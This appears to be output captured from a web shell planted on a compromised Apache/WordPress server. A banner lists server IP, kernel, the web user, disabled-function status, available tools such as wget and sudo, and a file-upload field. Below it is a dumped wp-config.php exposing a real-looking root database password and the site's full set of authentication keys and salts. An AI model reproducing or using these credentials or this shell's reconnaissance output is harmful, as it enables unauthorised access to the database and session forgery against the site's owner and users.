| Server IP : 188.151.22.197 / Your IP : 216.73.217.74 Web Server : Apache/2.4.62 (Rocky Linux) OpenSSL/3.5.5 System : Linux wsten.se 5.14.0-687.30.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jul 27 13:09:21 UTC 2026 x86_64 User : apache ( 48) PHP Version : 8.1.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/eric/vhost/eng/ |
Upload File : |
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'eng' );
/** Database username */
define( 'DB_USER', 'root' );
/** Database password */
define( 'DB_PASSWORD', 'wlan4winx86itanium!' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
define( 'WP_DEBUG', 1 );
if ( ! defined( 'FS_METHOD' ) ) define( 'FS_METHOD', 'direct' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '$1Gh/fv5{1*&A^(M~IHl*{[uKA1!gp3%|7[5SYNd+d$c`z4C}uO*GF)}u_tGSK|(' );
define( 'SECURE_AUTH_KEY', '-|^wYD7x)ey4k7KY@^]GCZu=a+ri0u1}3WnvLZf_3yqg2ypg1S-P_>hL`cHzE=eY' );
define( 'LOGGED_IN_KEY', '1Waw3dvll)Wuo;IZ%2ENWo)|&NB8FdUJ=jWX|#=@aZsMb/Y)R#v2@1WK0:M@$MX6' );
define( 'NONCE_KEY', ']L:IBtPm_ic,J,D|C0!hx+fkQ5AqTGN>DE~;kR-7>Ynv/&:1i5}fjrVG(p@T:K|#' );
define( 'AUTH_SALT', '/o5h&y5d%Q,9[$g0PL]/0`z9X/gb{e@W>b]g^<}L3}N]H*JSkq7JF~Z!&)F$5%R}' );
define( 'SECURE_AUTH_SALT', 'O+lP-!GTrsWH<r5xQpAA!eb6UH)RZL3%`U=mbq>|Mn,bTJ!jR:w-DDOE{$>v8/3M' );
define( 'LOGGED_IN_SALT', '2UCQc;DJjvtQu.6O$0|BqLg,wp DrmjC?c[JDkg_*Yz[!Q%cbGV3!mj~[^85Vw)=' );
define( 'NONCE_SALT', 'KSIRdVA|T*hTf@T$322C}ST=|V-TwdI`c+LcQ?Cb?EPu}R-M7])R@~~*Ry2R#@)y' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*
* At the installation time, database tables are created with the specified prefix.
* Changing this value after WordPress is installed will make your site think
* it has not been installed.
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';